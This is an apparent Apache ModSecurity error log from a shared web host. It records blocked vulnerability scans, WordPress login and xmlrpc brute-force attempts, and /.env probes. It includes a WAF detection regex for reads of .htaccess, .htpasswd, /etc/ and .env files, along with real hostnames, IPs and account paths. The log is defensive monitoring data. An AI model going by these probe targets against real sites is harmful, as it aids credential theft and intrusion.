[Tue May 26 13:00:30.374454 2026] [security2:error] [pid 470766:tid 470923] [client 4.201.75.230:5637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/class-t.api.php"] [unique_id "ahVMFujO_W1DqEcFHQ7j3gAAABs"]
[Tue May 26 13:00:31.237153 2026] [security2:error] [pid 470766:tid 471015] [client 138.229.101.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMF-jO_W1DqEcFHQ7j5wAAAHc"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 13:00:32.677486 2026] [security2:error] [pid 470766:tid 470905] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMGOjO_W1DqEcFHQ7j_QAAAAk"]
[Tue May 26 13:00:32.707774 2026] [security2:error] [pid 470766:tid 470958] [client 157.20.138.61:56293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMGOjO_W1DqEcFHQ7kBwAAAD4"]
[Tue May 26 13:00:32.707893 2026] [security2:error] [pid 470766:tid 470958] [client 157.20.138.61:56293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMGOjO_W1DqEcFHQ7kBwAAAD4"]
[Tue May 26 13:00:32.839412 2026] [security2:error] [pid 470766:tid 470982] [client 4.201.75.230:5645] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/sf.php"] [unique_id "ahVMGOjO_W1DqEcFHQ7kCQAAAFY"]
[Tue May 26 13:00:34.073286 2026] [security2:error] [pid 470766:tid 470978] [client 4.201.75.230:5335] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/kbfr.php"] [unique_id "ahVMGujO_W1DqEcFHQ7kIQAAAFI"]
[Tue May 26 13:00:35.042466 2026] [security2:error] [pid 470766:tid 471016] [client 138.229.101.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMGujO_W1DqEcFHQ7kMwAAAHg"], referer: https://anujtradingco.com
[Tue May 26 13:00:35.589414 2026] [security2:error] [pid 470766:tid 470917] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMG-jO_W1DqEcFHQ7kPgAAABU"]
[Tue May 26 13:00:36.162196 2026] [proxy:error] [pid 470766:tid 470862] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:00:36.162259 2026] [proxy_http:error] [pid 470766:tid 470862] [remote 198.235.24.123:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:00:36.162864 2026] [proxy:error] [pid 470766:tid 470862] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 13:00:36.162898 2026] [proxy_http:error] [pid 470766:tid 470862] [remote 198.235.24.123:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 13:00:37.832998 2026] [security2:error] [pid 470766:tid 470899] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMHejO_W1DqEcFHQ7kbwAAAAM"]
[Tue May 26 13:00:38.205712 2026] [core:crit] [pid 470766:tid 471000] (13)Permission denied: [client 40.77.167.50:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:00:38.679790 2026] [security2:error] [pid 470766:tid 470900] [client 4.201.75.230:5359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/chosen.php"] [unique_id "ahVMHujO_W1DqEcFHQ7kkQAAAAQ"]
[Tue May 26 13:00:39.565386 2026] [security2:error] [pid 470766:tid 470976] [client 176.65.139.232:58092] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.cercledepdy.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVMH-jO_W1DqEcFHQ7kpwAAAFA"]
[Tue May 26 13:00:40.394060 2026] [security2:error] [pid 470766:tid 470961] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMH-jO_W1DqEcFHQ7ksQAAAEE"]
[Tue May 26 13:00:42.632529 2026] [security2:error] [pid 470766:tid 470929] [client 176.65.139.238:44046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.adityacreations.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVMIujO_W1DqEcFHQ7k9QAAACE"]
[Tue May 26 13:00:42.920567 2026] [security2:error] [pid 470766:tid 470928] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMIujO_W1DqEcFHQ7k8QAAACA"]
[Tue May 26 13:00:43.300598 2026] [security2:error] [pid 470766:tid 470905] [client 157.20.138.61:56652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMI-jO_W1DqEcFHQ7k_wAAAAk"]
[Tue May 26 13:00:43.300771 2026] [security2:error] [pid 470766:tid 470905] [client 157.20.138.61:56652] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMI-jO_W1DqEcFHQ7k_wAAAAk"]
[Tue May 26 13:00:43.541000 2026] [security2:error] [pid 470766:tid 470949] [client 176.65.139.231:38912] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "adityacreations.co.in"] [uri "/.env"] [unique_id "ahVMI-jO_W1DqEcFHQ7lBgAAADU"]
[Tue May 26 13:00:45.543254 2026] [security2:error] [pid 470766:tid 470959] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMJejO_W1DqEcFHQ7lKQAAAD8"]
[Tue May 26 13:00:45.646464 2026] [security2:error] [pid 470766:tid 470995] [client 4.201.75.230:5638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/defaults.php"] [unique_id "ahVMJejO_W1DqEcFHQ7lMwAAAGM"]
[Tue May 26 13:00:48.106997 2026] [security2:error] [pid 470766:tid 470994] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMJ-jO_W1DqEcFHQ7lVgAAAGI"]
[Tue May 26 13:00:48.461895 2026] [autoindex:error] [pid 470766:tid 470995] [client 205.210.31.40:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://glorodbalsa.com/
[Tue May 26 13:00:50.384547 2026] [security2:error] [pid 470766:tid 471019] [client 104.194.132.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMKujO_W1DqEcFHQ7lmAAAAHs"], referer: https://www.anujtradingco.com/
[Tue May 26 13:00:50.763950 2026] [security2:error] [pid 470766:tid 470964] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMKujO_W1DqEcFHQ7lmQAAAEQ"]
[Tue May 26 13:00:51.193070 2026] [security2:error] [pid 470766:tid 470917] [client 104.194.132.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVMK-jO_W1DqEcFHQ7lpwAAABU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1430896&moderation-hash=683babac959ef6b0812e0407a9e1141b
[Tue May 26 13:00:52.263606 2026] [security2:error] [pid 470766:tid 470948] [client 91.231.89.34:39093] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "yatirimfinans.cagmedya.com"] [uri "/index.php"] [unique_id "ahVMK-jO_W1DqEcFHQ7lrQAAADQ"]
[Tue May 26 13:00:52.935239 2026] [security2:error] [pid 470766:tid 470903] [client 113.179.110.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMLOjO_W1DqEcFHQ7lzwAAAAc"]
[Tue May 26 13:00:53.163964 2026] [security2:error] [pid 470766:tid 471011] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMLOjO_W1DqEcFHQ7l2AAAAHM"]
[Tue May 26 13:00:53.699288 2026] [security2:error] [pid 470766:tid 470965] [client 157.20.138.61:57009] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMLejO_W1DqEcFHQ7l8gAAAEU"]
[Tue May 26 13:00:53.699427 2026] [security2:error] [pid 470766:tid 470965] [client 157.20.138.61:57009] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMLejO_W1DqEcFHQ7l8gAAAEU"]
[Tue May 26 13:00:55.358268 2026] [security2:error] [pid 470766:tid 470780] [remote 88.198.165.116:57994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVML-jO_W1DqEcFHQ7mGAAARA0"]
[Tue May 26 13:00:55.725077 2026] [security2:error] [pid 470766:tid 470993] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVML-jO_W1DqEcFHQ7mHgAAAGE"]
[Tue May 26 13:00:58.010880 2026] [security2:error] [pid 470766:tid 470985] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMMejO_W1DqEcFHQ7mWQAAAFk"]
[Tue May 26 13:00:58.326242 2026] [security2:error] [pid 470766:tid 470920] [client 4.201.75.230:5685] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/info.php"] [unique_id "ahVMMujO_W1DqEcFHQ7mYgAAABg"]
[Tue May 26 13:00:58.608869 2026] [security2:error] [pid 470766:tid 470974] [client 85.208.96.194:59544] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/event/list/"] [unique_id "ahVMMujO_W1DqEcFHQ7mcQAAAE4"]
[Tue May 26 13:00:58.609011 2026] [security2:error] [pid 470766:tid 470974] [client 85.208.96.194:59544] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/event/list/"] [unique_id "ahVMMujO_W1DqEcFHQ7mcQAAAE4"]
[Tue May 26 13:00:59.456445 2026] [core:crit] [pid 470766:tid 470926] (13)Permission denied: [client 66.249.70.137:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:01:00.480214 2026] [security2:error] [pid 470766:tid 470934] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMNOjO_W1DqEcFHQ7mlwAAACY"]
[Tue May 26 13:01:03.425154 2026] [security2:error] [pid 470766:tid 470932] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMN-jO_W1DqEcFHQ7m3AAAACQ"]
[Tue May 26 13:01:03.901039 2026] [security2:error] [pid 470766:tid 470784] [remote 178.104.90.233:48098] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.90.104.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVMN-jO_W1DqEcFHQ7m6gAAURE"]
[Tue May 26 13:01:04.247648 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:57370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMOOjO_W1DqEcFHQ7m9wAAAHI"]
[Tue May 26 13:01:04.247790 2026] [security2:error] [pid 470766:tid 471010] [client 157.20.138.61:57370] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMOOjO_W1DqEcFHQ7m9wAAAHI"]
[Tue May 26 13:01:04.403181 2026] [security2:error] [pid 470766:tid 470951] [client 4.201.75.230:5636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/bless.php"] [unique_id "ahVMOOjO_W1DqEcFHQ7m-wAAADc"]
[Tue May 26 13:01:04.899816 2026] [security2:error] [pid 470766:tid 470820] [remote 57.141.2.14:36536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 14.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVMOOjO_W1DqEcFHQ7nBQAAfTU"]
[Tue May 26 13:01:05.739025 2026] [security2:error] [pid 470766:tid 470918] [client 4.201.75.230:5325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/aa.php"] [unique_id "ahVMOejO_W1DqEcFHQ7nFgAAABY"]
[Tue May 26 13:01:07.247190 2026] [security2:error] [pid 470766:tid 470940] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMOujO_W1DqEcFHQ7nMAAAACw"]
[Tue May 26 13:01:07.705972 2026] [security2:error] [pid 470766:tid 471017] [client 4.201.75.230:5320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/xmrlpc.php"] [unique_id "ahVMO-jO_W1DqEcFHQ7nSgAAAHk"]
[Tue May 26 13:01:08.301063 2026] [security2:error] [pid 470766:tid 470844] [remote 84.247.181.196:39176] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVMPOjO_W1DqEcFHQ7nVAAAXE0"]
[Tue May 26 13:01:08.687954 2026] [security2:error] [pid 470766:tid 470916] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMPOjO_W1DqEcFHQ7nWgAAABQ"]
[Tue May 26 13:01:10.446565 2026] [security2:error] [pid 470766:tid 470896] [client 138.2.67.134:20816] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMPujO_W1DqEcFHQ7nhgAAAAA"]
[Tue May 26 13:01:11.037375 2026] [security2:error] [pid 470766:tid 470942] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMPujO_W1DqEcFHQ7njwAAAC4"]
[Tue May 26 13:01:11.062165 2026] [security2:error] [pid 470766:tid 471013] [client 4.201.75.230:5363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/class.php"] [unique_id "ahVMP-jO_W1DqEcFHQ7nmQAAAHU"]
[Tue May 26 13:01:11.222393 2026] [security2:error] [pid 470766:tid 470896] [client 138.2.67.134:20816] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMPujO_W1DqEcFHQ7nhgAAAAA"]
[Tue May 26 13:01:11.222457 2026] [security2:error] [pid 470766:tid 470896] [client 138.2.67.134:20816] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "bosscoirs.com"] [uri "/wp-comments-post.php"] [unique_id "ahVMPujO_W1DqEcFHQ7nhgAAAAA"]
[Tue May 26 13:01:12.162104 2026] [security2:error] [pid 470766:tid 471020] [client 4.201.75.230:5364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/aw.php"] [unique_id "ahVMQOjO_W1DqEcFHQ7nuQAAAHw"]
[Tue May 26 13:01:12.336363 2026] [security2:error] [pid 470766:tid 470825] [remote 209.42.20.53:58340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVMQOjO_W1DqEcFHQ7nuAAAKTo"]
[Tue May 26 13:01:13.317908 2026] [security2:error] [pid 470766:tid 471022] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVMQOjO_W1DqEcFHQ7nywAAAH4"]
[Tue May 26 13:01:14.746712 2026] [security2:error] [pid 470766:tid 470951] [client 157.20.138.61:57727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMQujO_W1DqEcFHQ7n_QAAADc"]
[Tue May 26 13:01:14.746839 2026] [security2:error] [pid 470766:tid 470951] [client 157.20.138.61:57727] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVMQujO_W1DqEcFHQ7n_QAAADc"]
[Tue May 26 13:01:14.842062 2026] [security2:error] [pid 470766:tid 470890] [remote 172.194.139.254:13808] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.139.194.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVMQujO_W1DqEcFHQ7n_AAAPXs"]
